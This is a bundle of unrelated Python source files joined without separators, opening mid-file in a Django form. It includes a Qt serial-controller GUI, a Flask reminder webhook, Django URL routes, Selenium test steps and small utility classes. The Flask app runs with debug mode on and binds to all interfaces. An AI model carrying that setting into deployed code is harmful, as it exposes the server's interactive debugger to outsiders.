        label=_('Telefone Principal?'),
        choices=YES_NO_CHOICES)

    # Segundo Telefone
    segundo_tipo = forms.ChoiceField(
        required=False,
        widget=forms.Select(),
        choices=TIPO_TELEFONE,
        label=_('Tipo Telefone'))
    segundo_ddd = forms.CharField(required=False, max_length=2, label=_('DDD'))
    segundo_numero = forms.CharField(
        required=False, max_length=10, label=_('Número'))
    segundo_principal = forms.ChoiceField(
        required=False,
        widget=forms.Select(),
        label=_('Telefone Principal?'),
        choices=YES_NO_CHOICES)

    class Meta:
        model = Usuario
        fields = ['username', 'email', 'nome', 'data_nascimento', 'sexo',
                  'plano', 'tipo', 'cep', 'end', 'numero', 'complemento',
                  'bairro', 'referencia', 'primeiro_telefone',
                  'segundo_telefone']

        widgets = {'username': forms.TextInput(attrs={'readonly': 'readonly'}),
                   'email': forms.TextInput(
                                 attrs={'style': 'text-transform:lowercase;'}),
                   }

    def __init__(self, *args, **kwargs):
        super(UsuarioEditForm, self).__init__(*args, **kwargs)
        self.fields['primeiro_telefone'].widget.attrs['class'] = 'telefone'
        self.fields['segundo_telefone'].widget.attrs['class'] = 'telefone'

    def valida_igualdade(self, texto1, texto2, msg):
        """Raise ValidationError(msg) unless the two texts are equal."""
        if texto1 != texto2:
            raise ValidationError(msg)
        return True

    def clean_primeiro_numero(self):
        """Assemble the first Telefone from the primeiro_* inputs.

        Stashes the Telefone in cleaned_data['primeiro_telefone'] and returns
        the cleaned number. BUG FIX: a clean_<field>() method must return the
        value for its own field; the original returned the whole cleaned_data
        dict, which Django then stored under 'primeiro_numero'.
        """
        # NOTE(review): Telefone is not among this module's visible imports —
        # presumably it lives in .models; confirm the import exists.
        telefone = Telefone()
        telefone.tipo = self.data['primeiro_tipo']
        telefone.ddd = self.data['primeiro_ddd']
        telefone.numero = self.data['primeiro_numero']
        telefone.principal = self.data['primeiro_principal']

        self.cleaned_data['primeiro_telefone'] = telefone
        return self.cleaned_data['primeiro_numero']

    def clean_segundo_numero(self):
        """Assemble the second Telefone from the segundo_* inputs.

        Same contract and fix as clean_primeiro_numero().
        """
        telefone = Telefone()
        telefone.tipo = self.data['segundo_tipo']
        telefone.ddd = self.data['segundo_ddd']
        telefone.numero = self.data['segundo_numero']
        telefone.principal = self.data['segundo_principal']

        self.cleaned_data['segundo_telefone'] = telefone
        return self.cleaned_data['segundo_numero']

    @transaction.atomic
    def save(self, commit=False):
        """Persist the Usuario, its Telefone records and auth User together."""
        usuario = super(UsuarioEditForm, self).save(commit)

        # Primeiro telefone
        tel = usuario.primeiro_telefone

        tel.tipo = self.data['primeiro_tipo']
        tel.ddd = self.data['primeiro_ddd']
        tel.numero = self.data['primeiro_numero']
        tel.principal = self.data['primeiro_principal']
        tel.save()

        usuario.primeiro_telefone = tel

        # Segundo telefone (optional)
        tel = usuario.segundo_telefone

        if tel:
            tel.tipo = self.data['segundo_tipo']
            tel.ddd = self.data['segundo_ddd']
            tel.numero = self.data['segundo_numero']
            tel.principal = self.data['segundo_principal']
            tel.save()
            usuario.segundo_telefone = tel

        # User: sync email and replace the (single) group membership.
        u = usuario.user
        u.email = usuario.email
        u.groups.remove(u.groups.first())
        u.groups.add(get_or_create_grupo(self.cleaned_data['tipo'].descricao))

        u.save()
        usuario.save()
        return usuario


class EspecialidadeMedicoForm(ModelForm):
    """Form binding a doctor to a specialty; both fields use Select2 widgets."""

    medico = forms.ModelChoiceField(
        widget=Select2(select2attrs={'width': '535px'}),
        queryset=get_medicos())

    especialidade = forms.ModelChoiceField(
        widget=Select2(select2attrs={'width': '535px'}),
        queryset=Especialidade.objects.all())

    class Meta:
        model = EspecialidadeMedico
        fields = ['especialidade', 'medico']

#! python3

"""
    GUI for Ultrasonic Temperature Controller
    Copyright (c) 2015 by Stefan Lehmann

"""

import os
import datetime
import logging
import json

import serial
from qtpy.QtWidgets import QAction, QDialog, QMainWindow, QMessageBox, \
    QDockWidget, QLabel, QFileDialog, QApplication
from qtpy.QtGui import QIcon
from qtpy.QtCore import QSettings, QCoreApplication, Qt, QThread, \
    Signal

from serial.serialutil import SerialException
from jsonwatch.jsonitem import JsonItem
from jsonwatch.jsonnode import JsonNode
from jsonwatchqt.logger import LoggingWidget
from pyqtconfig.config import QSettingsManager
from jsonwatchqt.plotsettings import PlotSettingsWidget
from jsonwatchqt.objectexplorer import ObjectExplorer
from jsonwatchqt.plotwidget import PlotWidget
from jsonwatchqt.serialdialog import SerialDialog, PORT_SETTING, \
    BAUDRATE_SETTING
from jsonwatchqt.utilities import critical, pixmap
from jsonwatchqt.recorder import RecordWidget
from jsonwatchqt.csvsettings import CSVSettingsDialog, DECIMAL_SETTING, \
    SEPARATOR_SETTING


logger = logging.getLogger("jsonwatchqt.mainwindow")

# QSettings keys under which the main window persists its state.
WINDOWSTATE_SETTING = "mainwindow/windowstate"
GEOMETRY_SETTING = "mainwindow/geometry"
FILENAME_SETTING = "mainwindow/filename"


def strip(s):
    """Return *s* with leading and trailing whitespace removed."""
    return s.strip()


def utf8_to_bytearray(x):
    """Encode the str *x* as a UTF-8 bytearray."""
    return bytearray(x.encode('utf-8'))


def bytearray_to_utf8(x):
    """Decode the UTF-8 bytes-like object *x* to str."""
    return str(x, 'utf-8')


def set_default_settings(settings: QSettingsManager):
    """Install fallback values for the CSV export settings."""
    defaults = {
        DECIMAL_SETTING: ',',
        SEPARATOR_SETTING: ';',
    }
    settings.set_defaults(defaults)


class SerialWorker(QThread):
    """Background thread polling a serial port; emits each received line."""

    # Emitted with the receive timestamp and the decoded, stripped line.
    data_received = Signal(datetime.datetime, str)

    def __init__(self, ser: serial.Serial, parent=None):
        super().__init__(parent)
        self.serial = ser
        self._quit = False

    def run(self):
        """Poll the port until quit() is called."""
        while not self._quit:
            try:
                if self.serial.isOpen() and self.serial.inWaiting():
                    self.data_received.emit(
                        datetime.datetime.now(),
                        strip(bytearray_to_utf8(self.serial.readline()))
                    )
                else:
                    # The original loop busy-waited with no delay, pegging a
                    # CPU core while idle; sleep briefly between polls.
                    self.msleep(10)
            except SerialException:
                pass

    def quit(self):
        # Cooperative stop flag checked by run(); overrides QThread.quit().
        self._quit = True


class MainWindow(QMainWindow):
    """Application main window.

    Wires one serial connection to four dock widgets (object explorer,
    plot settings, logger, data recorder) that all share a single JsonNode
    tree (``self.rootnode``).
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.recording_enabled = False
        self.serial = serial.Serial()
        self.rootnode = JsonNode('')
        self._connected = False
        self._dirty = False
        self._filename = None

        # settings
        self.settings = QSettingsManager()
        set_default_settings(self.settings)

        # Controller Settings
        self.settingsDialog = None

        # object explorer
        self.objectexplorer = ObjectExplorer(self.rootnode, self)
        self.objectexplorer.nodevalue_changed.connect(self.send_serialdata)
        self.objectexplorer.nodeproperty_changed.connect(self.set_dirty)
        self.objectexplorerDockWidget = QDockWidget(self.tr("object explorer"),
                                                    self)
        self.objectexplorerDockWidget.setObjectName(
            "objectexplorer_dockwidget")
        self.objectexplorerDockWidget.setWidget(self.objectexplorer)

        # plot widget
        self.plot = PlotWidget(self.rootnode, self.settings, self)

        # plot settings
        self.plotsettings = PlotSettingsWidget(self.settings, self.plot, self)
        self.plotsettingsDockWidget = QDockWidget(self.tr("plot settings"),
                                                  self)
        self.plotsettingsDockWidget.setObjectName("plotsettings_dockwidget")
        self.plotsettingsDockWidget.setWidget(self.plotsettings)

        # log widget
        self.loggingWidget = LoggingWidget(self)
        self.loggingDockWidget = QDockWidget(self.tr("logger"), self)
        self.loggingDockWidget.setObjectName("logging_dockwidget")
        self.loggingDockWidget.setWidget(self.loggingWidget)

        # record widget
        self.recordWidget = RecordWidget(self.rootnode, self)
        self.recordDockWidget = QDockWidget(self.tr("data recording"), self)
        self.recordDockWidget.setObjectName("record_dockwidget")
        self.recordDockWidget.setWidget(self.recordWidget)

        # actions and menus
        self._init_actions()
        self._init_menus()

        # statusbar
        statusbar = self.statusBar()
        statusbar.setVisible(True)
        self.connectionstateLabel = QLabel(self.tr("Not connected"))
        statusbar.addPermanentWidget(self.connectionstateLabel)
        statusbar.showMessage(self.tr("Ready"))

        # layout
        self.setCentralWidget(self.plot)
        self.addDockWidget(Qt.LeftDockWidgetArea,
                           self.objectexplorerDockWidget)
        self.addDockWidget(Qt.LeftDockWidgetArea, self.plotsettingsDockWidget)
        self.addDockWidget(Qt.BottomDockWidgetArea, self.loggingDockWidget)
        self.addDockWidget(Qt.BottomDockWidgetArea, self.recordDockWidget)

        self.load_settings()

    def _init_actions(self):
        """Create all QActions with shortcuts, icons and handlers."""
        # Serial Dialog
        self.serialdlgAction = QAction(self.tr("Serial Settings..."), self)
        self.serialdlgAction.setShortcut("F6")
        self.serialdlgAction.setIcon(QIcon(pixmap("configure.png")))
        self.serialdlgAction.triggered.connect(self.show_serialdlg)

        # Connect
        self.connectAction = QAction(self.tr("Connect"), self)
        self.connectAction.setShortcut("F5")
        self.connectAction.setIcon(QIcon(pixmap("network-connect-3.png")))
        self.connectAction.triggered.connect(self.toggle_connect)

        # Quit
        self.quitAction = QAction(self.tr("Quit"), self)
        self.quitAction.setShortcut("Alt+F4")
        self.quitAction.setIcon(QIcon(pixmap("window-close-3.png")))
        self.quitAction.triggered.connect(self.close)

        # Save Config as
        self.saveasAction = QAction(self.tr("Save as..."), self)
        self.saveasAction.setShortcut("Ctrl+Shift+S")
        self.saveasAction.setIcon(QIcon(pixmap("document-save-as-5.png")))
        self.saveasAction.triggered.connect(self.show_savecfg_dlg)

        # Save file
        self.saveAction = QAction(self.tr("Save"), self)
        self.saveAction.setShortcut("Ctrl+S")
        self.saveAction.setIcon(QIcon(pixmap("document-save-5.png")))
        self.saveAction.triggered.connect(self.save_file)

        # Load file
        self.loadAction = QAction(self.tr("Open..."), self)
        self.loadAction.setShortcut("Ctrl+O")
        self.loadAction.setIcon(QIcon(pixmap("document-open-7.png")))
        self.loadAction.triggered.connect(self.show_opencfg_dlg)

        # New
        self.newAction = QAction(self.tr("New"), self)
        self.newAction.setShortcut("Ctrl+N")
        self.newAction.setIcon(QIcon(pixmap("document-new-6.png")))
        self.newAction.triggered.connect(self.new)

        # start recording
        self.startrecordingAction = QAction(self.tr("Start recording"), self)
        self.startrecordingAction.setShortcut("F9")
        self.startrecordingAction.setIcon(QIcon(pixmap("media-record-6.png")))
        self.startrecordingAction.triggered.connect(self.start_recording)

        # stop recording
        self.stoprecordingAction = QAction(self.tr("Stop recording"), self)
        self.stoprecordingAction.setShortcut("F10")
        self.stoprecordingAction.setIcon(QIcon(pixmap("media-playback-stop-8.png")))
        self.stoprecordingAction.setEnabled(False)
        self.stoprecordingAction.triggered.connect(self.stop_recording)

        # clear record
        self.clearrecordAction = QAction(self.tr("Clear"), self)
        self.clearrecordAction.setIcon(QIcon(pixmap("editclear.png")))
        self.clearrecordAction.triggered.connect(self.clear_record)

        # export record
        self.exportcsvAction = QAction(self.tr("Export to csv..."), self)
        self.exportcsvAction.setIcon(QIcon(pixmap("text_csv.png")))
        self.exportcsvAction.triggered.connect(self.export_csv)

        # show record settings
        self.recordsettingsAction = QAction(self.tr("Settings..."), self)
        self.recordsettingsAction.setIcon(QIcon(pixmap("configure.png")))
        self.recordsettingsAction.triggered.connect(self.show_recordsettings)

        # Info
        self.infoAction = QAction(self.tr("Info"), self)
        self.infoAction.setShortcut("F1")
        self.infoAction.triggered.connect(self.show_info)

    def _init_menus(self):
        """Assemble the File, View and Record menus from the actions."""
        # file menu
        self.fileMenu = self.menuBar().addMenu(self.tr("File"))
        self.fileMenu.addAction(self.newAction)
        self.fileMenu.addAction(self.loadAction)
        self.fileMenu.addAction(self.saveAction)
        self.fileMenu.addAction(self.saveasAction)
        self.fileMenu.addSeparator()
        self.fileMenu.addAction(self.connectAction)
        self.fileMenu.addAction(self.serialdlgAction)
        self.fileMenu.addSeparator()
        self.fileMenu.addAction(self.quitAction)

        # view menu
        self.viewMenu = self.menuBar().addMenu(self.tr("View"))
        self.viewMenu.addAction(
            self.objectexplorerDockWidget.toggleViewAction())
        self.viewMenu.addAction(self.plotsettingsDockWidget.toggleViewAction())
        self.viewMenu.addAction(self.loggingDockWidget.toggleViewAction())
        self.viewMenu.addAction(self.recordDockWidget.toggleViewAction())

        # record menu
        self.recordMenu = self.menuBar().addMenu(self.tr("Record"))
        self.recordMenu.addAction(self.startrecordingAction)
        self.recordMenu.addAction(self.stoprecordingAction)
        self.recordMenu.addAction(self.exportcsvAction)
        self.recordMenu.addSeparator()
        self.recordMenu.addAction(self.clearrecordAction)
        self.recordMenu.addSeparator()
        self.recordMenu.addAction(self.recordsettingsAction)

        # info menu
        self.menuBar().addAction(self.infoAction)

    def show_info(self):
        """Display the About message box."""
        QMessageBox.about(
            self, QApplication.applicationName(),
            "%s %s\n"
            "Copyright (c) by %s" %
            (
                QCoreApplication.applicationName(),
                QCoreApplication.applicationVersion(),
                QCoreApplication.organizationName(),
            )
        )

    def load_file(self, filename):
        """Load a JSON config file into the root node.

        On a parse error the previously loaded file (if any) is reloaded;
        on a missing file the current filename is cleared.
        """
        old_filename = self.filename if self.filename != filename else None
        self.filename = filename

        try:
            with open(filename, 'rb') as f:
                try:
                    self.objectexplorer.model().beginResetModel()
                    self.rootnode.load(bytearray_to_utf8(f.read()))
                    self.objectexplorer.model().endResetModel()
                except ValueError as e:
                    critical(self, "File '%s' is not a valid config file."
                             % filename)
                    logger.error(str(e))
                    if old_filename is not None:
                        self.load_file(old_filename)
                    else:
                        self.filename = None

        except FileNotFoundError as e:
            logger.error(str(e))
            self.filename = None

        self.objectexplorer.refresh()

    def load_settings(self):
        """Restore window geometry/state and reopen the last used file."""
        settings = QSettings()

        # window geometry; restoreGeometry raises on a missing/invalid value.
        # Narrowed from the original bare 'except:' so KeyboardInterrupt and
        # SystemExit are not swallowed.
        try:
            self.restoreGeometry(settings.value(GEOMETRY_SETTING))
        except Exception:
            logger.debug("error restoring window geometry")

        # window state
        try:
            self.restoreState(settings.value(WINDOWSTATE_SETTING))
        except Exception:
            logger.debug("error restoring window state")

        # filename
        self.filename = settings.value(FILENAME_SETTING)
        if self.filename is not None:
            self.load_file(self.filename)

    def save_settings(self):
        """Persist window state, geometry and the current filename."""
        settings = QSettings()
        settings.setValue(WINDOWSTATE_SETTING, self.saveState())
        settings.setValue(GEOMETRY_SETTING, self.saveGeometry())
        settings.setValue(FILENAME_SETTING, self.filename)

    def closeEvent(self, event):
        """Prompt to save when dirty, then persist settings and shut down."""
        if self.dirty:
            res = QMessageBox.question(
                self,
                QCoreApplication.applicationName(),
                # BUG FIX: '%' binds tighter than the conditional expression,
                # so the original collapsed the whole prompt to "unknown"
                # when no filename was set; parenthesize the conditional.
                self.tr("Save changes to file '%s'?" %
                        (self.filename
                         if self.filename is not None else "unknown")),
                QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel
            )
            if res == QMessageBox.Cancel:
                event.ignore()
                return
            elif res == QMessageBox.Yes:
                self.save_file()

        self.save_settings()

        # NOTE(review): the worker is only flagged to stop, not joined —
        # confirm whether a wait() is needed before the window dies.
        try:
            self.worker.quit()
        except AttributeError:
            pass

        try:
            self.serial.close()
        except (SerialException, AttributeError):
            pass

    def new(self):
        """Clear the root node (new, empty configuration)."""
        self.objectexplorer.model().beginResetModel()
        self.rootnode.clear()
        self.objectexplorer.model().endResetModel()

    def send_reset(self):
        """Send a PID-reset command to the controller."""
        jsonstring = json.dumps({"resetpid": 1})
        self.serial.write(bytearray(jsonstring, 'utf-8'))

    def receive_serialdata(self, time, data):
        """Handle one line from the serial worker: log, parse, refresh."""
        self.loggingWidget.log_input(data)

        try:
            self.rootnode.from_json(data)
        except ValueError as e:
            logger.error(str(e))

        # refresh widgets
        self.objectexplorer.refresh()
        self.plot.refresh(time)
        if self.recording_enabled:
            self.recordWidget.add_data(time, self.rootnode)

    def send_serialdata(self, node):
        """Write a changed node's JSON representation to the serial port."""
        if isinstance(node, JsonItem):
            if self.serial.isOpen():
                s = node.to_json()
                self.serial.write(utf8_to_bytearray(s + '\n'))
                self.loggingWidget.log_output(s.strip())

    def show_serialdlg(self):
        """Open the serial settings dialog and return its exec result.

        BUG FIX: the original returned None, so connect()'s
        '== QDialog.Rejected' check could never detect a cancelled dialog.
        """
        dlg = SerialDialog(self.settings, self)
        return dlg.exec_()

    def toggle_connect(self):
        """Connect or disconnect depending on the current port state."""
        if self.serial.isOpen():
            self.disconnect()
        else:
            self.connect()

    def connect(self):
        """Open the configured serial port and start the reader thread."""
        # Load port setting
        port = self.settings.get(PORT_SETTING)
        baudrate = self.settings.get(BAUDRATE_SETTING)

        # If no port has been selected before show serial settings dialog
        if port is None:
            if self.show_serialdlg() == QDialog.Rejected:
                return
            port = self.settings.get(PORT_SETTING)
            baudrate = self.settings.get(BAUDRATE_SETTING)

        # Serial connection
        try:
            self.serial.port = port
            self.serial.baudrate = baudrate
            self.serial.open()
        except ValueError:
            QMessageBox.critical(
                self, QCoreApplication.applicationName(),
                self.tr("Serial parameters e.g. baudrate, databits are out "
                        "of range.")
            )
        except SerialException:
            QMessageBox.critical(
                self, QCoreApplication.applicationName(),
                self.tr("The device '%s' can not be found or can not be "
                        "configured." % port)
            )
        else:
            self.worker = SerialWorker(self.serial, self)
            self.worker.data_received.connect(self.receive_serialdata)
            self.worker.start()

            self.connectAction.setText(self.tr("Disconnect"))
            self.connectAction.setIcon(QIcon(pixmap("network-disconnect-3.png")))
            self.serialdlgAction.setEnabled(False)
            self.connectionstateLabel.setText(
                self.tr("Connected to %s") % port)
            self._connected = True
            self.objectexplorer.refresh()

    def disconnect(self):
        """Stop the reader thread, close the port and reset the UI state."""
        self.worker.quit()
        self.serial.close()
        self.connectAction.setText(self.tr("Connect"))
        self.connectAction.setIcon(QIcon(pixmap("network-connect-3.png")))
        self.serialdlgAction.setEnabled(True)
        self.connectionstateLabel.setText(self.tr("Not connected"))
        self._connected = False
        self.objectexplorer.refresh()

    def show_savecfg_dlg(self):
        """Ask for a target filename, then save the configuration there."""
        filename, _ = QFileDialog.getSaveFileName(
            self, self.tr("Save configuration file..."),
            directory=os.path.expanduser("~"),
            filter="Json file (*.json)"
        )

        if filename:
            self.filename = filename
            self.save_file()

    def save_file(self):
        """Write the current configuration; fall back to Save-As if unnamed."""
        if self.filename is not None:
            config_string = self.rootnode.dump()
            with open(self.filename, 'w') as f:
                f.write(config_string)
            self.dirty = False
        else:
            self.show_savecfg_dlg()

    def show_opencfg_dlg(self):
        """Ask for a configuration file and load it."""
        # show file dialog
        filename, _ = QFileDialog.getOpenFileName(
            self, self.tr("Open configuration file..."),
            directory=os.path.expanduser("~"),
            filter=self.tr("Json file (*.json);;All files (*.*)")
        )

        # load config file
        if filename:
            self.load_file(filename)

    def refresh_window_title(self):
        """Rebuild the title from app name/version, filename and dirty flag."""
        s = "%s %s" % (QCoreApplication.applicationName(),
                       QCoreApplication.applicationVersion())
        if self.filename is not None:
            s += " - " + self.filename
        if self.dirty:
            s += "*"
        self.setWindowTitle(s)

    def start_recording(self):
        """Enable data recording and toggle the record actions."""
        self.recording_enabled = True
        self.startrecordingAction.setEnabled(False)
        self.stoprecordingAction.setEnabled(True)

    def stop_recording(self):
        """Disable data recording and toggle the record actions."""
        self.recording_enabled = False
        self.startrecordingAction.setEnabled(True)
        self.stoprecordingAction.setEnabled(False)

    def export_csv(self):
        """Export the recorded dataframe to CSV with configured separators."""
        filename, _ = QFileDialog.getSaveFileName(
            self, QCoreApplication.applicationName(),
            filter="CSV files(*.csv);;All files (*.*)"
        )

        if filename == "":
            return

        # get current dataframe and export to csv
        df = self.recordWidget.dataframe
        decimal = self.settings.get(DECIMAL_SETTING)
        df = df.applymap(lambda x: str(x).replace(".", decimal))
        df.to_csv(
            filename, index_label="time",
            sep=self.settings.get(SEPARATOR_SETTING)
        )

    def clear_record(self):
        """Discard all recorded data."""
        self.recordWidget.clear()

    def show_recordsettings(self):
        """Open the CSV export settings dialog."""
        dlg = CSVSettingsDialog(self)
        dlg.exec_()

    # filename property
    @property
    def filename(self):
        return self._filename

    @filename.setter
    def filename(self, value=""):
        # Setting the filename also refreshes the window title.
        self._filename = value
        self.refresh_window_title()

    # dirty property
    @property
    def dirty(self):
        return self._dirty

    @dirty.setter
    def dirty(self, value):
        self._dirty = value
        self.refresh_window_title()

    def set_dirty(self):
        """Slot: mark the configuration as modified."""
        self.dirty = True

    # connected property
    @property
    def connected(self):
        return self._connected

# -*- coding: utf-8 -*-
"""


"""
from datetime import datetime, timedelta
import os

from flask import request
from flask import Flask
import pytz

import db
from utils import get_remote_addr, get_location_data


app = Flask(__name__)


@app.route('/yo-water/', methods=['POST', 'GET'])
def yowater():
    """Handle Yo callbacks for the water-reminder service.

    The payload comes from the query string or, failing that, the JSON body.
    Without a 'reply' object: register the user (timezone resolved from the
    caller's IP) unless already registered. With a 'reply' object: reschedule
    the reminder and archive the reply.

    Always returns a plain-text response. (The original fell through and
    returned None for an already-registered user with no reply, which makes
    Flask raise an error.)
    """
    payload = request.args if request.args else request.get_json(force=True)
    username = payload.get('username')

    reminder = db.reminders.find_one({'username': username})

    reply_object = payload.get('reply')

    if reply_object is None:
        # First contact: create the user record if it does not exist yet.
        # Reuse the lookup done above instead of querying a second time.
        if reminder is None:
            address = get_remote_addr(request)
            data = get_location_data(address)
            if not data:
                return 'Timezone needed'

            user_data = {'created': datetime.now(pytz.utc),
                         'username': username}

            if data.get('time_zone'):
                user_data.update({'timezone': data.get('time_zone')})

            db.reminders.insert(user_data)

        return 'OK'
    else:
        reply_text = reply_object.get('text')

        if reply_text == u'Can\'t right now 😖':
            # User postponed: try again in 15 minutes.
            reminder['trigger_date'] = datetime.now(pytz.utc) + timedelta(minutes=15)
        else:
            # Positive reply: advance the program and remind in an hour.
            reminder['step'] += 1
            reminder['trigger_date'] = datetime.now(pytz.utc) + timedelta(minutes=60)

        reminder['last_reply_date'] = datetime.now(pytz.utc)

        db.reminders.update({'username': username},
                            reminder)

        db.replies.insert({'username': username,
                           'created': datetime.now(pytz.utc),
                           'reply': reply_text})

        return 'OK'


if __name__ == "__main__":
    app.debug = True
    app.run(host="0.0.0.0", port=int(os.environ.get("PORT", "5000")))

from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin

admin.autodiscover()

import views

# URL table for the conference site. One entry was a bare (regex, include)
# tuple while every other entry used url(); made it consistent.
urlpatterns = patterns('',
    url(r'^pis', views.pis),
    url(r'^words', views.words, { 'titles': False }),
    url(r'^projects', views.projects),
    url(r'^posters', views.posters),
    url(r'^posterpresenters', views.posterpresenters),
    url(r'^pigraph', views.pigraph),
    url(r'^institutions', views.institutions),
    url(r'^institution/(?P<institutionid>\d+)', views.institution),
    url(r'^profile/$', views.profile),
    url(r'^schedule/(?P<email>\S+)', views.schedule),
    url(r'^ratemeeting/(?P<rmid>\d+)/(?P<email>\S+)', views.ratemeeting),
    url(r'^submitrating/(?P<rmid>\d+)/(?P<email>\S+)', views.submitrating),
    url(r'^feedback/(?P<email>\S+)', views.after),
    url(r'^breakouts', views.breakouts),
    url(r'^breakout/(?P<bid>\d+)', views.breakout),
    url(r'^about', views.about),
    url(r'^buginfo', views.buginfo),
    url(r'^allrms', views.allrms),
    url(r'^allratings', views.allratings),
    url(r'^login', views.login),
    url(r'^logout', views.logout),
    url(r'^edit_home_page', views.edit_home_page),
    url(r'^pi/(?P<userid>\d+)', views.pi), # , name = 'pi'),
    url(r'^pi/(?P<email>\S+)', views.piEmail), # , name = 'pi'),
    url(r'^project/(?P<abstractid>\S+)', views.project, name = 'project'),
    url(r'^scope=(?P<scope>\w+)/(?P<url>.+)$', views.set_scope),
    url(r'^active=(?P<active>\d)/(?P<url>.+)$', views.set_active),
    url(r'^admin/', include(admin.site.urls)),
    url(r'', include('django_browserid.urls')),
    url(r'^$', views.index, name = 'index'),
    ) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import json

from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions

from behave import *

@step('I share first element in the history list')
def step_impl(context):
    """Open the History dialog and click the share control of its first entry."""
    context.execute_steps(u'''
        given I open History dialog
    ''')
    popup = context.browser.find_element_by_id("HistoryPopup")
    items = popup.find_elements_by_xpath('.//li[not(@data-clone-template)]')
    assert items, "There are no entries in the history"
    first = items[0]
    first.find_elements_by_xpath('.//*[@data-share-item]')[0].click()

@then('the json to share is shown with url "{url}" and contains the following headers')
def step_impl(context, url):
    """Verify the share dialog's JSON snippet: expected url and headers.

    The original assertion messages referenced undefined names (`value`,
    `name`), so a failing assertion raised NameError instead of reporting
    the mismatch; they now use the names actually in scope.
    """
    # Wait for modal to appear
    WebDriverWait(context.browser, 10).until(
        expected_conditions.visibility_of_element_located(
            (By.ID, 'ShareRequestForm')))
    output = context.browser.execute_script("return restman.ui.editors.get('#ShareRequestEditor').getValue();")

    snippet = json.loads(output)

    assert url == snippet["url"], "URL: \"{}\" not in output.\nOutput: {}".format(url, output)
    for row in context.table:
        assert row['key'] in snippet['headers'], "Header {} is not in output".format(row['key'])
        assert row['value'] == snippet['headers'][row['key']], \
            "Header value is not correct. Expected: {}; Actual: {}".format(
                row['value'], snippet['headers'][row['key']])

@step('I click on import request')
def step_impl(context):
    """Open the History dialog and switch to the import-request form."""
    context.execute_steps(u'''
        given I open History dialog
    ''')
    # Click on import
    context.browser.find_element_by_id('ImportHistory').click()
    form_visible = expected_conditions.visibility_of_element_located(
        (By.ID, 'ImportRequestForm'))
    WebDriverWait(context.browser, 10).until(form_visible)

@step('I write a shared request for "{url}"')
def step_impl(context, url):
    """Type a canned shared request for *url* into the import editor."""
    req = json.dumps({
        "method": "POST",
        "url": url,
        "headers": {
            "Content-Type": "application/json",
            "X-Test-Header": "shared_request"
        },
        "body": {
            "type": "form",
            "content": {
                "SomeKey": "SomeValue11233",
                "SomeOtherKey": "SomeOtherValue019",
            }
        }
    })
    # base64.b64encode() requires bytes on Python 3; encode the JSON first
    # and decode the result so str.format() does not embed a b'...' repr
    # inside the JavaScript snippet.
    encoded = base64.b64encode(req.encode('utf-8')).decode('ascii')
    context.browser.execute_script(
        "return restman.ui.editors.setValue('#ImportRequestEditor', atob('{}'));".format(encoded))

@step('I click on load import request')
def step_impl(context):
    """Submit the import-request form via its Import button."""
    # Import request
    context.browser.find_element_by_xpath("//*[@id='ImportRequestForm']//input[@value='Import']").click()

#!/usr/bin/env python
"""
This script is used to run tests, create a coverage report and output the
statistics at the end of the tox run.
To run this script just execute ``tox``
"""
import re

from fabric.api import local, warn
from fabric.colors import green, red


if __name__ == '__main__':
    # Kept some files for backwards compatibility. If support is dropped,
    # remove it here
    deprecated_files = '*utils_email*,*utils_log*'

    # flake8 honours only the LAST --ignore option on the command line, so
    # passing it twice silently dropped E126; give both codes in one option.
    local('flake8 --ignore=E126,W391 --statistics'
          ' --exclude=submodules,migrations,build .')
    local('coverage run --source="django_libs" manage.py test -v 2'
          ' --traceback --failfast --settings=django_libs.tests.settings'
          ' --pattern="*_tests.py"')
    local('coverage html -d coverage'
          ' --omit="*__init__*,*/settings/*,*/migrations/*,*/tests/*,'
          '*admin*,{}"'.format(deprecated_files))
    # Pull the total percentage out of the generated HTML report and
    # colour the summary line accordingly.
    total_line = local('grep -n pc_cov coverage/index.html', capture=True)
    percentage = float(re.findall(r'(\d+)%', total_line)[-1])
    if percentage < 100:
        warn(red('Coverage is {0}%'.format(percentage)))
    else:
        print(green('Coverage is {0}%'.format(percentage)))

from baroque.entities.event import Event


class EventCounter:
    """A counter of events."""

    def __init__(self):
        # Total number of events seen, plus a per-type breakdown keyed by
        # the Python class of each event's ``type`` attribute.
        self.events_count = 0
        self.events_count_by_type = {}

    def increment_counting(self, event):
        """Counts an event

        Args:
            event (:obj:`baroque.entities.event.Event`): the event to be counted

        """
        assert isinstance(event, Event)
        self.events_count += 1
        key = type(event.type)
        self.events_count_by_type[key] = self.events_count_by_type.get(key, 0) + 1

    def count_all(self):
        """Tells how many events have been counted globally

        Returns:
            int

        """
        return self.events_count

    def count(self, eventtype):
        """Tells how many events have been counted of the specified type

        Args:
            eventtype (:obj:`baroque.entities.eventtype.EventType`): the type of events to be counted

        Returns:
            int

        """
        return self.events_count_by_type.get(type(eventtype), 0)


import numpy as np


class Surface(object):
    def __init__(self, image, edge_points3d, edge_points2d):
        """
        A textured planar quad defined by four corner points given in
        clockwise order; the first point is the origin of the surface's
        coordinate system.

        :param image: image array
        :param edge_points3d: array of 3d coordinates of 4 corner points in clockwise direction
        :param edge_points2d: array of 2d coordinates of 4 corner points in clockwise direction
        """
        assert len(edge_points3d) == 4 and len(edge_points2d) == 4

        self.image = image
        self.edge_points3d = edge_points3d
        # float32 is what cv2.getPerspectiveTransform expects.
        self.edge_points2d = np.float32(edge_points2d)
        self.normal = self._get_normal_vector()

    def top_left_corner3d(self):
        return self.edge_points3d[0]

    def top_right_corner3d(self):
        return self.edge_points3d[1]

    def bottom_right_corner3d(self):
        return self.edge_points3d[2]

    def bottom_left_corner3d(self):
        return self.edge_points3d[3]

    def distance_to_point(self, point):
        """Signed distance of *point* from the surface plane (along normal)."""
        offset = point - self.top_left_corner3d()
        return self.normal.dot(offset)

    def _get_normal_vector(self):
        """
        :return: the unit normal vector of the surface; its direction
        determines which side is the front of the surface
        """
        origin = self.edge_points3d[0]
        right = self.edge_points3d[1]
        down = self.edge_points3d[3]
        n = np.cross(down - origin, right - origin)
        return n / np.linalg.norm(n)


class Polyhedron(object):
    """A solid bounded by a collection of Surface objects."""
    def __init__(self, surfaces):
        # surfaces: iterable of Surface instances forming the boundary
        self.surfaces = surfaces


class Space(object):
    """A container for Polyhedron models."""

